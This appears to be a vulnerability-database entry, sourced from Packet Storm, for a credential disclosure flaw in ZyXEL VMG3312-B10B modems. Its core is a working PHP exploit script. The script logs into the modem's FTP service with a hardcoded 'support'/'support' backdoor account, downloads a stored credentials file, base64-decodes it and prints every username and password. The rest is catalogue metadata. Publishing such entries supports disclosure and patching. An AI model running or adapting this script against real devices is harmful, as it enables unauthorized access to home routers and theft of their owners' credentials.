ID

VAR-E-201810-0436


TITLE

ZyXEL VMG3312-B10B Credential Disclosure

Trust: 0.5

sources: PACKETSTORM: 150031

DESCRIPTION

ZyXEL VMG3312-B10B versions prior to 1.00 (AAPP.7) suffer from a credential disclosure vulnerability.

Trust: 0.5

sources: PACKETSTORM: 150031

AFFECTED PRODUCTS

vendor:zyxelmodel:vmg3312-b10bscope: - version: -

Trust: 0.5

sources: PACKETSTORM: 150031

EXPLOIT

# Exploit Title: ZyXEL VMG3312-B10B - Leak Credentials < 1.00(AAPP.7)
# Date: 2018-10-28
# Exploit Author: numan tA1/4rle @numanturle
# Vendor Homepage: https://www.zyxel.com/
# Software Link: ftp://ftp.zyxel.com.tr/ZyXEL_URUNLERI/MODEMLER/VDSL_MODEMLER/VMG3312-B10B/
# Firmware: 1.00(AAPP.0)D7
# Tested on: windows
# Fixed firmware: 1.00(AAPP.7)


<?php
$ftp_server = "192.168.1.1"; // modem ip address
$ftp_conn = ftp_connect($ftp_server) or die("ftp server close");
$login = ftp_login($ftp_conn, "support", "support"); // backdoor

$local_file = "crackme";
$server_file = "/var/csamu"; // base64_encode files

if (ftp_get($ftp_conn, $local_file, $server_file, FTP_BINARY)) {
$open = file($local_file);
foreach($open as $u_p){
$bomb = explode(" ",$u_p);
$user = $bomb[0];
$pass = base64_decode($bomb[1]);
if(!empty($pass)){
echo "{$user}:{$pass}<br>";
}else {
continue;
}
}
}else {
echo "pfff";
}
ftp_close($ftp_conn);
?>

Trust: 0.5

sources: PACKETSTORM: 150031

EXPLOIT HASH

LOCAL

SOURCE

md5: d7d23c2b70dbfc679ed549383bbcd020
sha-1: 89c129b722d4b5a99b44d73f6beb219e44b1c168
sha-256: 043dd9f6802d82984a7afef78cd5da2562fb13860ca43e1bd31ad2d12e9cdc30
md5: d7d23c2b70dbfc679ed549383bbcd020

Trust: 0.5

sources: PACKETSTORM: 150031

PRICE

free

Trust: 0.5

sources: PACKETSTORM: 150031

TYPE

info disclosure

Trust: 0.5

sources: PACKETSTORM: 150031

TAGS

tag:exploit

Trust: 0.5

tag:info disclosure

Trust: 0.5

sources: PACKETSTORM: 150031

CREDITS

numan turle

Trust: 0.5

sources: PACKETSTORM: 150031

EXTERNAL IDS

db:PACKETSTORMid:150031

Trust: 0.5

sources: PACKETSTORM: 150031

SOURCES

db:PACKETSTORMid:150031

LAST UPDATE DATE

2022-07-27T09:11:19.029000+00:00


SOURCES RELEASE DATE

db:PACKETSTORMid:150031date:2018-10-30T18:32:22